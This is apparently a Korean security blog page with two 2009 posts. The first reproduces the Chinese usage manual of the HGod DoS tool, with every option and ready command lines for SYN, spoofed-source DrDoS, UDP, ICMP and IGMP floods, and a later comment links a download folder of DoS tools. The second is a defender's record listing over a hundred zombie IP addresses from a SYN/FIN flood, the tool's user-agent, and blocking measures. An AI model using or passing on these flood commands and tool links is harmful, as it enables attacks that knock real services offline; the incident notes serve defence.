'Syn'에 해당되는 글 2건

  1. 2009.08.13 HGod(HUC DoS Tool) 사용법 (5)
  2. 2009.05.08 SYN, FIN 플러딩 공격 좀비 리스트
2009.08.13 22:32

HGod(HUC DoS Tool) 사용법

HGod --- HUC DoS Tool V0.51 版功能改进:

1. 增加了ICMP/UDP/IGMP Flood发包时的随机产生数据包大小的选项。
2. 调整了SYN Flood的线程参数及延时控制。


=====================================================================

功能介绍

1. 具有SYN/DrDos/UDP/ICMP/IGMP拒绝服务测试功能的选项。
2. 只运行在Win2000/XP以上版本的Windows系统里。
3. 能够用来测试网络安全产品或者常见操作系统的抗拒绝服务性能。
4. 经过测试SYN Flood能够达到每秒50000个连接请求。
5. 杀伤力强大, 一个SYN Flood线程足以让Win2000 IIS连接数占满而无法访问。
6. 使用参数比较多, 自己慢慢摸索, 请不要使用本软件用于破坏行为。

=====================================================================

使用说明

d:\>hgod
============================== HUC DoS Tool V0.51 =============================
================= By Lion, Welcome to http://www.cnhonker.com =================

[Usage:]
  hgod <Target> <StartPort[-EndPort]|Port1,Port2,Port3...> [Option]
  <Target>       Flooding Host IP|Hostname.
  <StartPort>    Flooding Host Port. Port Num must <100.

[Option:]
  -a:AttackTime  The Time(minute) of Attack. Set 0 for Always. Default is 0.
  -b:Packsize    The Size of Packet, for UDP/ICMP/IGMP Mode. Default is 1000.
                 Set 0 to Random.
  -d:Delay       Delay of Send Packet, for UDP/ICMP/IGMP Mode. Default is 10ms.
  -l:Speed       Your Network Link Speed(?M). Default is 100M.
                 Set 0 to no Restrict no Delay Mode, Set >100 to Horror Mode.
  -m:Mode        Attack Mode, Use SYN/DrDoS/UDP/ICMP/IGMP. Default is SYN.
  -n:Num         Only for SYN/DrDoS Mode, Change SourceIP, Set Num to 1-65535.
  -p:SourcePort  Set SourcePort, Default is Random. DrDoS Mode mast be set.
  -s:SourceIP    Set SourceIP, Default is Random. DrDoS Mode mast be set.
  -t:Thread      The Threads Num for Flooding, Max is 100, Default is 5.


1. 使用参数说明

  <Target>
  为对方的IP或者域名, 如果使用域名, 将每隔一定时间程序自动检测该域名的IP是否改变并更新目标IP。

  <StartPort>
  为要测试的目标主机端口, 多个端口用","符号分隔, 对SYN/DrDos/UDP/IGMP模式有效, ICMP模式请随便填写一个。

  -a:AttackTime  
  设置攻击测试时间(分钟), 设置0为无时间限制, 默认为0。

  -b:Packsize    
  设置UDP/ICMP/IGMP攻击测试模式的数据包大小, 默认是1000, 设置0为随机产生数据包的大小。

  -d:Delay       
  设置UDP/ICMP/IGMP攻击测试模式发送两个数据包之间的延时(毫秒), 默认是10毫秒。

  -l:Speed       
  可以通过网络连接速度(?M)来判断你自己的网络和机器能够承受的攻击测试线程序及强度, 默认是100M。设置0为无限制的模式, 设置大于100为恐怖级的测试. (恐怖级? 自己试试就知道了:) 。
            
  -m:Mode        
  攻击测试的模式, 分别有SYN/DrDos/UDP/ICMP/IGMP, 默认是SYN模式。

  -n:Num         
  只对SYN/DrDos模式有效, 为源IP的变化范围, 一个c段内变化设为255, 一个b段内变化设为65535。(一般不用此功能) 。

  -p:SourcePort
  指定数据包的源端口, 默认为随机产生源端口。

  -s:SourceIP
  指定源IP地址, 默认为随机产生, DrDos模式需要指定。

  -t:Thread   
  指定发送数据包的线程数。最多支持100个线程(当然, 要你的CPU够快才行:), 默认是5个线程。


2. 使用举例

  a. SYN Flood  
  d:\>hgod 192.168.7.1 21,25,80,135,139,445 -t:10

  b. DrDos
  d:\>hgod 192.168.7.1 80 -m:drdos -t:10 -s:192.168.7.2 -n:200

  c. UDP Flood
  d:\>hgod 192.168.7.1 137,138,445,3456,4000 -m:udp -t:10

  d. ICMP Flood
  d:\>hgod 192.168.7.1 1 -m:icmp -t:10

  e. IGMP Flood
  d:\>hgod 192.168.7.1 139 -m:igmp -t:10

=====================================================================

Trackback 0 Comment 5
  1. 2009.08.13 22:34 address edit & del reply

    비밀댓글입니다

  2. 2011.09.27 15:58 address edit & del reply

    비밀댓글입니다

  3. 2012.06.19 02:48 address edit & del reply

    비밀댓글입니다

  4. 2012.07.14 17:23 address edit & del reply

    비밀댓글입니다

  5. Favicon of http://214 2124 2015.06.14 17:13 address edit & del reply

    https://www.dropbox.com/sh/d4st6psjqr7ep28/AAC9naD_pPdcSDjsXFv98xT9a?dl=0 << 파합X 툴모음 DrDos포함

2009.05.08 18:58

SYN, FIN 플러딩 공격 좀비 리스트

금일(5월8일) 오후 1시 10분경 부터 5분간 80번 포트 SYN, FIN 플러딩 공격에 사용된 좀비 상위 리스트

   횟수 아이피
   2212 211.49.158.170
   2157 121.181.190.29
   2147 124.28.146.243
   2115 123.215.192.191
   1847 211.117.77.144
   1813 118.218.205.241
   1797 58.227.15.69
   1776 221.151.14.69
   1761 125.133.172.147
   1660 210.123.108.110
   1632 211.229.213.163
   1600 221.138.34.87
   1588 121.137.122.93
   1575 121.135.127.20
   1559 211.179.11.89
   1547 211.228.4.22
   1540 110.11.157.205
   1526 211.37.36.167
   1521 211.224.152.104
   1521 124.28.106.54
   1489 211.104.95.11
   1476 221.148.200.48
   1448 210.116.172.39
   1430 59.1.28.113
   1418 59.6.52.35
   1415 58.127.246.206
   1406 124.54.128.4
   1400 61.100.172.72
   1396 114.204.115.226
   1376 121.135.232.153
   1376 118.40.236.91
   1375 211.231.54.240
   1373 220.78.187.219
   1357 116.124.74.142
   1353 211.114.22.74
   1348 222.103.189.83
   1335 58.76.129.131
   1331 220.73.248.116
   1330 123.215.164.93
   1313 211.230.28.33
   1304 121.149.209.174
   1299 59.4.127.17
   1292 220.117.244.188
   1291 218.239.108.42
   1282 211.51.37.65
   1277 218.50.57.119
   1275 59.23.131.26
   1275 114.200.44.161
   1270 211.194.131.186
   1270 211.106.147.183
   1265 218.234.158.247
   1265 125.131.211.1
   1265 121.158.199.51
   1262 123.109.50.46
   1259 220.83.15.175
   1253 211.194.141.37
   1250 220.119.110.183
   1247 210.112.177.244
   1231 221.140.46.119
   1227 220.77.104.4
   1224 221.155.90.24
   1219 116.124.152.34
   1217 125.183.166.231
   1211 124.138.53.130
   1210 221.159.60.170
   1197 211.36.190.21
   1189 114.206.113.144
   1186 119.192.133.36
   1185 211.106.104.150
   1177 59.9.80.162
   1176 222.109.186.79
   1168 119.195.210.99
   1158 222.109.226.251
   1155 121.163.153.238
   1154 125.177.182.211
   1146 220.77.138.43
   1146 211.106.229.226
   1140 61.77.134.242
   1140 211.202.19.153
   1114 61.99.32.58
   1111 222.103.246.72
   1105 125.128.154.134
   1101 59.18.248.206
   1100 222.104.123.230
   1099 59.28.198.231
   1090 59.27.240.145
   1090 121.174.106.80
   1088 220.70.204.20
   1083 121.189.162.88
   1069 121.182.180.191
   1066 221.150.24.192
   1065 123.248.36.60
   1062 123.229.225.34
   1061 218.151.87.204
   1058 221.153.88.55
   1057 114.200.17.50
   1049 59.9.187.114
   1049 59.17.253.208
   1044 59.31.216.184
   1041 59.18.147.237
   1040 211.114.22.140
   1036 211.214.94.21
   1013 58.121.190.116
   1010 61.255.205.104
   1008 61.84.109.100
   1003 61.74.189.8
   ... 외 493건

Agent 정보에 "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)Cache-Control: no-store, must-revalidate" 로 입력되는 툴을 사용한 공격

웹 방화벽 및 DDoS 임계값 조정을 통한 차단...

공격자가 차단 인지에 따른 공격 유형 변경 대응


Trackback 1 Comment 0